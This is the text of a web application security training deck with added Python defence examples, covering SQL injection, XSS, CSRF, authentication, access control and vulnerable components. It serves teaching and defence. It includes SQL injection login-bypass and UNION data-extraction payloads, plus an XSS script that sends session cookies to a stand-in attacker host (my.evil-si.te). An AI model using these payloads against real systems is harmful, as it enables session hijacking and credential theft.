Web Application Security in a nutshell


>>> View this presentation online at http://webappsec-nutshell.kimminich.de/ <<<

An ultra-compact intro (or refresher) to Web Application Security derived from my Web Application Security Training Workshop (http://de.slideshare.net/BjrnKimminich/web-application-security-21684264).


1. WEB APPLICATION SECURITY IN A NUTSHELL
   AN ULTRA-COMPACT INTRO (OR REFRESHER) TO WEB APPLICATION SECURITY
   Created by Björn Kimminich / @bkimminich
2. BJÖRN KIMMINICH
   Application Security Officer at Kuehne + Nagel (AG & Co.) KG
   Author of open-source pentest training webapp OWASP juice-shop
   OWASP member and OWASP Zed Attack Proxy contributor
3. FAMOUS LAST WORDS...
   “Nobody would bother to hack us.”
   “Our Firewall, IDS and IPS will keep us safe.”
   “We will add security to the system later.”
   “What's the worst that could actually happen?”
4. INJECTION
5. INJECTION MEANS...
   ...tricking an application into including unintended commands in the data sent to an interpreter.
6. INTERPRETER MEANS...
   ...a program that takes a String and interprets it as a command.
7. INTERPRETERS ARE USED FOR...
   SQL, HQL, OS Shell, LDAP, XPath, ...
8. BYPASSING AUTHENTICATION WITH SQL INJECTION
   String query = "SELECT id FROM users " +
                  "WHERE name = '" + req.getParameter("username") + "' " +
                  "AND password = '" + req.getParameter("password") + "'";
   The intended use case results in a query like this:
   SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
9. ATTACK EXAMPLES ON AUTHENTICATION QUERIES
   Disabling password check for a known username:
   SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
   Logging in without even knowing a username:
   SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
10. SPYING OUT DATA WITH SQL INJECTION
    String query = "SELECT id,author,title,price FROM books " +
                   "WHERE title LIKE '%" + req.getParameter("query") + "%'";
    The intended use case results in a query like this:
    SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
11. ATTACK EXAMPLES ON DATA RETRIEVAL QUERIES
    Probing for right number of result set columns:
    SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
    SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
    SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
    Using known column names to extract data:
    SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
12. PREVENTING INJECTION
    Avoid Interpreters
    Bind Variables
    Prepared Statements
    Least Privileges for app DB user
    White List Input Validation
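The authentication query from the slides, written once with string concatenation and once with bind variables, as an added example that is not part of the deck (Python with SQLite instead of the slides' Java; the users table is constructed sample data):

```python
# Added example, not from the slides: the login query of the "Bypassing
# authentication with SQL injection" slide, first concatenated, then with
# bind variables as recommended on the "Preventing injection" slide.
import sqlite3


def make_db():
    # Constructed sample table; plaintext passwords only to mirror the
    # slide's query (see the hashing slides for how to store them).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'bjoern', 'secret')")
    return db


def login_concat(db, username, password):
    # Vulnerable: the interpreter (SQLite) cannot tell attacker-supplied
    # text from the command, so a quote plus '--' rewrites the WHERE clause.
    query = ("SELECT id FROM users WHERE name = '" + username +
             "' AND password = '" + password + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_prepared(db, username, password):
    # Hardened: the '?' placeholders are bind variables. The values travel
    # separately from the statement, so quotes and '--' are plain data.
    query = "SELECT id FROM users WHERE name = ? AND password = ?"
    row = db.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("prepared, real credentials:", login_prepared(db, "bjoern", "secret"))
    print("concat, slide 9 payload:   ", login_concat(db, "bjoern'--", "wrong"))
    print("prepared, slide 9 payload: ", login_prepared(db, "bjoern'--", "wrong"))
```

Running it shows the concatenated version returning bjoern's id for the slide 9 payloads and the prepared version returning None for them.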
13. CROSS SITE SCRIPTING (XSS)
14. MALICIOUS CODE IS SENT...
    ...to an innocent user's browser through
    a form field or URL (Reflected XSS)
    a previously stored DB record (Persistent XSS)
    a DOM element of a rich JS client (Local XSS)
15. POSSIBLE DAMAGE FROM XSS
    stolen user session
    stolen sensitive data
    rewriting web page
    redirecting to malicious site
16. XSS VULNERABILITY EXAMPLE
    http://bookwo.rm/titles/search?keywords=raspberry%20pi
    The intended use case is to display the keywords above the results:
    <% String keywords = request.getParameter("keywords");
       List<Book> results = titleSearchService.findByKeywords(keywords.split(" ")); %>
    There are <%=results.size()%> results for your search by <em><%=keywords%></em>
    <table>
    <% for (Book book : results) { %>
      <%-- render result as table rows --%>
    <% } %>
    </table>
17. XSS ATTACK EXAMPLES
    Probing for XSS Vulnerability
    <script>alert(1)</script>
    Stealing User Session
    <script>new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);</script>
    Site Defacement
    <script>document.body.background="http://my.evil-si.te/image.jpg";</script>
18. PREVENTING XSS
    Do not unnecessarily include user supplied input into output
    Output encode all user supplied input
    Sanitize HTML where user supplied HTML is unavoidable
    White List Input Validation
19. CROSS SITE REQUEST FORGERY (CSRF)
20. A VICTIM'S BROWSER...
    ...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request:
    Session Cookie
    Basic Authentication
    Authorization HTTP Header
    ...
21. CSRF ATTACK EXAMPLES
22. PREVENTING CSRF
    Add a secret token to all sensitive requests
    This token must not be automatically submitted
    Require secondary authentication for sensitive functions
    Beware exposing the token in a Referer HTTP header
    Make sure your application has no XSS holes that could be exploited to attack others!
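A token scheme following the first two bullets of slide 22, as an added example that is not from the deck: the token is derived from the session id with an HMAC under a server secret, placed in the form body (not in a cookie, so the browser never submits it on its own) and checked on every sensitive request. SERVER_SECRET, the request dictionary shape and the JSESSIONID cookie name are assumptions.

```python
# Added example, not from the slides: a CSRF token bound to the session,
# submitted only from the page itself and verified server-side.
import hashlib
import hmac
import secrets

# Assumed: in a real deployment this is loaded from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    # Binding the token to the session id means a token copied from one
    # user's page is useless together with another user's session cookie.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_is_valid(session_id, submitted_token):
    if not submitted_token:
        return False
    expected = issue_csrf_token(session_id)
    # compare_digest keeps the comparison time independent of the mismatch position
    return hmac.compare_digest(expected, submitted_token)


def handle_transfer(request):
    # request: dict with 'cookies' (sent automatically by the browser) and
    # 'form' (what the page itself put into the POST body).
    session_id = request["cookies"].get("JSESSIONID")
    if not session_id:
        return 401, "not logged in"
    if not csrf_token_is_valid(session_id, request["form"].get("csrf_token")):
        # A forged cross-site request carries the cookie but not the form token.
        return 403, "missing or wrong CSRF token"
    return 200, "transferred %s to %s" % (request["form"]["amount"], request["form"]["to"])


if __name__ == "__main__":
    sid = "constructed-session-id"
    forged = {"cookies": {"JSESSIONID": sid}, "form": {"amount": "1000", "to": "mallory"}}
    genuine = {"cookies": {"JSESSIONID": sid},
               "form": {"amount": "10", "to": "alice", "csrf_token": issue_csrf_token(sid)}}
    print(handle_transfer(forged))
    print(handle_transfer(genuine))
```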
23. BROKEN AUTHENTICATION
24. TYPICAL AUTHENTICATION FLAWS
    Allowing weak passwords
    Storing SSL certificate insecurely
    Credentials passed via insecure http connection
    Exposing session ids in URLs, via unencrypted network, logs, ...
25. SIDE CHANNEL ATTACK VECTORS
    Change Password
    “Remember me”
    Forgot Password
    Secret Questions
    Make sure your application does not store credentials in its database unencrypted!
26. CLASSICAL BROKEN AUTHENTICATION... ...DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE
    http://sick-cure-ba.nk/login.do
    POST /login.do HTTP/1.1
    Host: sick-cure-ba.nk
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded

    username=bjoern&password=secret
27. WEAK HASHES PUT PASSWORDS AT RISK... ...AS DO UNSALTED STRONG HASH ALGORITHMS
    id  username    password
    1   admin       d033e22ae348aeb5660fc2140aec35850c4da997
    2   bjoern      2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b
    3   localhorst  0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe464e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006
    Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512 bit length. You can even crack password hashes online, e.g. at CrackStation or via a tweet to @PlzCrack.
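Salted, iterated password hashing as the alternative to the unsalted digests in the table above, as an added example that is not from the deck. It uses PBKDF2-HMAC-SHA256 from the Python standard library; the iteration count and the storage string format are assumptions chosen for the example.

```python
# Added example, not from the slides: per-user random salt plus a slow
# key derivation, so equal passwords get different hashes and rainbow
# tables built for plain SHA-1/256/512 do not apply.
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed value; tune to the hardware you run on


def hash_password(password, salt=None):
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Self-describing record: algorithm, cost, salt and digest, all needed to verify later.
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


def unsalted_sha1(password):
    # What row 1 of the slide's table did: same password, same hash, for every user.
    return hashlib.sha1(password.encode()).hexdigest()


if __name__ == "__main__":
    print("unsalted sha1('admin'):", unsalted_sha1("admin"))
    first, second = hash_password("secret"), hash_password("secret")
    print("same password, different records:", first != second)
    print("both verify:", verify_password("secret", first) and verify_password("secret", second))
```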
28. BROKEN ACCESS CONTROL
29. COMMON AUTHORIZATION MISTAKES
    Hiding object references instead of restricting access
    Displaying only authorized links and menu choices
    Trusting client-side access control mechanisms
    Lack of server-side verification of user privileges
30. REQUEST TAMPERING FOR PRIVILEGE ESCALATION... ...AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES
    http://logistics-worldwi.de/showShipment?id=40643108
    http://my-universi.ty/api/students/6503/exams/view
    http://document-warehou.se/landingpage?content=index.html
31. SECURING AUTHORIZATION
    Never rely on “Security by obscurity”
    Replace direct object references with temporary mappings
    Restrict data and functionality access to authorized users
    Enforce user or role based permissions
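The showShipment URL from slide 30 served through a temporary per-user reference mapping plus a server-side ownership check, combining the second and third bullets of slide 31. This is an added example, not from the deck; the shipment records, user names and the ShipmentAccess class are constructed for it.

```python
# Added example, not from the slides: indirect object references and
# server-side authorization for the showShipment?id=... request.
import secrets

# Constructed sample data; the first id is the one shown on slide 30.
SHIPMENTS = {
    40643108: {"owner": "bjoern", "status": "in transit"},
    40643109: {"owner": "alice", "status": "delivered"},
}


class ShipmentAccess:
    def __init__(self):
        self._refs = {}  # (user, opaque ref) -> real shipment id

    def reference_for(self, user, shipment_id):
        # Temporary mapping: the page links to an unguessable per-user ref
        # instead of the database id, so tampering with the number is pointless.
        ref = secrets.token_urlsafe(16)
        self._refs[(user, ref)] = shipment_id
        return ref

    def show_shipment(self, user, ref):
        # Hiding the id is not the access control: the ownership check below
        # runs on every request regardless of what the client sent.
        shipment_id = self._refs.get((user, ref))
        if shipment_id is None:
            return 404, None
        shipment = SHIPMENTS[shipment_id]
        if shipment["owner"] != user:
            return 403, None
        return 200, shipment


if __name__ == "__main__":
    access = ShipmentAccess()
    ref = access.reference_for("bjoern", 40643108)
    print("owner via ref:   ", access.show_shipment("bjoern", ref))
    print("other user, ref: ", access.show_shipment("alice", ref))
    print("raw id as ref:   ", access.show_shipment("bjoern", "40643109"))
```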
32. BROKEN ENVIRONMENT
33. POSSIBLE ENVIRONMENTAL VULNERABILITIES
    Software Libraries
    Application Server
    Web Server
    Operating System
    ...
34. KNOWN VULNERABILITY EXAMPLES
    Component  | Vulnerability                                                                                                   | Affected
    OpenSSL    | Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (Heartbleed) | 1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1
    Unix Bash  | Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (Shellshock)       | CGI, OpenSSH, DHCP, QMail, ...
    Struts     | Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method        | before 2.3.16.1
    Struts     | Wildcard cookiesName not properly restricts access to the getClass() method, which allows ClassLoader manipulation | before 2.3.16.2
35. PROTECTION FROM ENVIRONMENTAL VULNERABILITIES
    Monitor security of used components
    Keep up with patches for used components
    Remove unnecessary stuff on all levels
    Restrict use of unapproved components
    Java and .NET project dependencies can be monitored by OWASP Dependency Check, which relies on the NIST National Vulnerability Database. For Javascript and Node.js modules there is Retire.js, which is updated manually via its GitHub project. Both tools integrate well with typical software build processes.
36. Q&A
37. CREDITS
    Presentation created with reveal.js, The HTML Presentation Framework
    Based on free material provided by OWASP, The Open Web Application Security Project
    Background image based on Digital Shodan by sephiroth-kmfdm
38. THE END
    BY BJÖRN KIMMINICH / KIMMINICH.DE
    These slides are publicly available on GitHub and Slideshare.
